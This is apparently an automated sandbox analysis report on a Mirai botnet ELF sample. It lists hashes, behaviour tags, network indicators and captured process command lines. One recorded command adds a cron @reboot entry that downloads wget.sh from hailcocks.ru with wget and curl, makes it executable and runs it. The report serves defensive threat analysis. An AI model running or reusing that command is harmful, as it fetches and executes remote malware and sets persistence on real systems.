Malware Analysis Report

2024-11-15 08:23

Sample ID 241028-cv347svrfw
Target 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
Tags
botnet mirai defense_evasion execution persistence privilege_escalatio
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615

Threat Level: Known bad

The file 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf was found to be: Known bad.

Malicious Activity Summary

botnet mirai defense_evasion execution persistence privilege_escalatio

Mirai family

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 02:24

Signatures

Mirai family

mirai

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 02:24

Reported

2024-10-28 02:27

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

130s

Max time network

136s

Command Line

[/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 217.160.70.42 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.HAq4X7 /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [kswapd0] /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf N/A

Processes

/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf

[/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 217.160.70.42:53 kingstonwikkerink.dyn udp
CZ 195.133.92.51:18557 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.HAq4X7

MD5 3afbea3182e7ee7d34038d10c18b2ac4
SHA1 1d2168cb7cd54872f95082bb778efe16868150e5
SHA256 7f6dd9d0683c71dd02243f3500f06d58969859be09dac2e3d048b0300481033b
SHA512 8cc16b8c01cab818044dc49be83acf28fa7a0f5eda0b05fb87832478caccf35fd58f4b4b132b10045d9210e6287a2674f8b3002de5b78834e5f58f0922334b01